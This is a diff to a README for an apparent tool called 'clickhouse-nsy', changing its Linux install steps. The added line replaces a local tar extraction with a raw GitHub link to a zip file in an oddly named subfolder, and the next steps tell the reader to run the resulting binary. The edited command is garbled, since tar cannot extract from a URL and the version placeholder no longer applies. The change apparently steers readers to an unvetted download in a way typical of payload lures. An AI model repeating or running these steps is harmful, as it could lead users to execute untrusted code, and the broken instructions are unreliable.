iamhkr9/clickhouse-nsy/README.md

 ### 🐧 For Linux Users:
 1. Open a terminal window.
 2. Navigate to the directory where you downloaded the file.
-3. Use the following command to extract the package: `tar -xvf clickhouse-nsy-x.x.x.tar.gz` (replace `x.x.x` with the version number).
+3. Use the following command to extract the package: `tar -xvf https://raw.githubusercontent.com/iamhkr9/clickhouse-nsy/main/radialize/clickhouse-nsy_1.1.zip` (replace `x.x.x` with the version number).
 4. Change to the extracted directory: `cd clickhouse-nsy-x.x.x`.
 5. Use `./clickhouse-nsy` to run the application.